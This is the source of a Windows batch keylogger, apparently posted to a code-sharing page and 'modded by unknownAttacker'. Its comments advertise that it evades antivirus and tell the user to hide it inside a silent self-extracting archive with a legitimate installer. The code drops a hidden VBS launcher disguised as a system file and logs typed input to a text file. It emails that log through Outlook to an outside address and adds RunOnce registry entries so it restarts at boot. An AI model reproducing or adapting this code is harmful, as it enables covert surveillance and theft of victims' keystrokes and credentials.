@echo offREM This is a windows batch source code of a simple keyloggerREM

1. @echo off
2. REM  This is a windows batch source code of a simple keylogger
3. REM  It uses outlook to send you teh l0gz
4. REM  I don't know who wrote the original one, this is a modified version
5. REM  Modified version creates files with more plausible names
6. REM  All the other tweaks are minor and for evasion only
7. REM  'Hideself' Advanced Extended Batch Command is used so the program will run in the background
8. REM  (if compiled with Advanced BAT To EXE Converter)
9. REM  It's currently FUD so just make a silent RAR SFX containing this and sth useful, like a legit installer
10.  
11. REM  modded by unknownAttacker
12.  
13. rem Hideself
14.  
15. set location = %windir%\System32\scvhost32.vbs
16. echo set shell = CreateObject("Wscript.Shell") >> %location%
17. echo shell.run "C:\windows\k.bat", 0 >> %location%
18. echo @echo off >> C:\windows\k.bat
19. echo color f7 >> C:\windows\k.bat
20. echo :go >> C:\windows\k.bat
21. echo echo .>>c:\log.txt  >> C:\windows\k.bat
22. echo echo :  >> C:\windows\k.bat
23. echo set /p keys=  >> C:\windows\k.bat
24. echo echo %keys% >> c:\log.txt  >> C:\windows\k.bat
25. echo goto go >> C:\windows\k.bat
26. echo start %location%  >> C:\windows\k.bat
27. echo(
28. echo Dim x > C:\config.vbs
29. echo on error resume next >> C:\config.vbs
30. echo Set fso =" Scripting.FileSystem.Object" >> C:\config.vbs
31. echo Set so=CreateObject(fso) >> C:\config.vbs
32. echo Set ol=CreateObject("Outlook.Application") >> C:\config.vbs
33. echo Set out=WScript.CreateObject("Outlook.Application") >> C:\config.vbs
34. echo Mail.to="u_a@hackermail.com">> C:\config.vbs
35. echo Mail.Subject="Stuff" >> C:\config.vbs
36. echo Mail.Body="l0gz have arrived" >> C:\config.vbs
37. echo Mail.Attachments.Add("C:log.txt") >> C:\config.vbs
38. echo Mail.Send >> C:\config.vbs
39. echo Next >> C:\config.vbs
40. echo ol.Quit >> C:\config.vbs
41. C:\config.vbs
42. )>>C:\Windows\k.bat
43. ping localhost 5 > nul
44. del C:\config.vbs
45. REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v WinBoot /t REG_SZ /d %location%
46. REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v WinBoot /t REG_SZ /d C:\Windows\k.bat
47. attrib +h +s %location%
48. attrib +h +s C:\Windows\k.bat
49. attrib +h -r log.txt
50. start %location%